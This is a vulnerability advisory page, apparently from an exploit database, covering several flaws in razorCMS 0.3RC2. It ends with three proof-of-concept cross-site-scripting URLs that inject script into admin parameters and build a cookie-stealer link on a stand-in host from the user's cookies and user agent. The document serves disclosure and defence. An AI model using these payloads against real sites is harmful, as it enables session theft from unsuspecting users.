header-logo
Suggest Exploit
vendor:
razorCMS
by:
SecurityFocus
7.5
CVSS
HIGH
Local Information Disclosure, Local Access Validation, Security Bypass, and Cross-Site Scripting
200, 264, 352, 79
CWE
Product Name: razorCMS
Affected Version From: 0.3RC2
Affected Version To: 0.3RC2
Patch Exists: YES
Related CWE: N/A
CPE: a:razorcms:razorcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

razorCMS Multiple Vulnerabilities

razorCMS is prone to a local information-disclosure vulnerability, a local access-validation vulnerability, a security-bypass vulnerability, and multiple cross-site-scripting vulnerabilities. Attackers can exploit these issues to gain access to sensitive information, create denial-of-service conditions, gain elevated privileges, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successful exploits may aid in further attacks.

Mitigation:

Upgrade to the latest version of razorCMS, and apply all security patches provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34566/info

razorCMS is prone to a local information-disclosure vulnerability, a local access-validation vulnerability, a security-bypass vulnerability, and multiple cross-site-scripting vulnerabilities.

Attackers can exploit these issues to gain access to sensitive information, create denial-of-service conditions, gain elevated privileges, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successful exploits may aid in further attacks.

razorCMS 0.3RC2 is vulnerable; other versions may also be affected.

http://www.example.com/cms/admin/?action=edit&slab=home&#039;><script>alert(&#039;http://yourcookiestealer.org/evil.php?cookie=&#039;%20+%20encodeURI(document.cookie)%20+%20&#039;&useragent=&#039;%20+%20encodeURI(navigator.userAgent));</script><form

http://www.example.com/cms/admin/?action=showcats&unpub=true&slabID=1&catname=sidebar&#039;><script>alert(&#039;http://yourcookiestealer.org/evil.php?cookie=&#039;%20+%20encodeURI(document.cookie)%20+%20&#039;&useragent=&#039;%20+%20encodeURI(navigator.userAgent));</script><form

http://www.example.com/cms/admin/?action=reordercat&cat=sidebar&#039;><script>alert(&#039;http://yourcookiestealer.org/evil.php?cookie=&#039;%20+%20encodeURI(document.cookie)%20+%20&#039;&useragent=&#039;%20+%20encodeURI(navigator.userAgent));</script><form&param=0,1